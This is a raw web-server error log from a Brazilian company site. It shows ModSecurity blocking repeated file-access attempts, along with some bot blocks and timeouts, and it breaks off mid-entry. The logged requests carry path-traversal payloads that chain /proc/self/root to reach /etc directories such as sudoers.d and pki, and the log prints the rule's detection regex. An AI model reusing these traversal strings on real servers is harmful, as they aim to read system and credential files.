[Mon Mar 16 22:13:02.459550 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:58860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqntSswJuvopo3lOiTvAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:03.286301 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:54838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqn6TCbgAP5jq5TehdfgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:03.992678 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:58866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqn9SswJuvopo3lOiTvgAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:05.235997 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:58880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqoaQpVkWug9HeOt9j2QAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:20.057974 2026] [proxy_fcgi:error] [pid 10772:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:13:22.408529 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:49270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqsbysWC90G-1nBrB2owAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:22.413306 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.243.203:37018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqsUr9dMAiw-8KANN7vAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:23.722500 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:49280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqs0r9dMAiw-8KANN7vwAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:25.147024 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:49288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqtbABkC4fWIHEf8EvTgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:27.087499 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.243.203:58428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqt8_BxrYCr4hPDw8dEQAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:31.963454 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:40950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiquo6lpbStxTqkSkuYTwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:31.964051 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:49290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqu7ABkC4fWIHEf8EvVQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:31.965061 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.228.16:52360] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiqu9SswJuvopo3lOiTwwAAAJI"]
[Mon Mar 16 22:13:33.999747 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:34646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqvVajLEzk2WiQ-11FwwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:36.774871 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:34650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqwLysWC90G-1nBrB2pwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:38.367536 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:43648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqwkr9dMAiw-8KANN7wAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:41.153782 2026] [proxy_fcgi:error] [pid 10651:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49288] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:13:42.471410 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:43650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqxs_BxrYCr4hPDw8dFgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:43.192377 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.243.203:40962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqx6TCbgAP5jq5TehdjgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:44.095663 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:43656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqyLABkC4fWIHEf8EvVgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:46.000870 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:34856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqyUr9dMAiw-8KANN7wgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:13:46.031936 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.244.31:35622] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiqyo6lpbStxTqkSkuYUQAAAkg"]
[Mon Mar 16 22:13:46.885339 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:43670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqyqTCbgAP5jq5TehdkQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:13:49.702517 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:55336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqzY6lpbStxTqkSkuYUwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:02.129940 2026] [proxy_fcgi:error] [pid 10831:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49856] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:14:02.369777 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:55336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 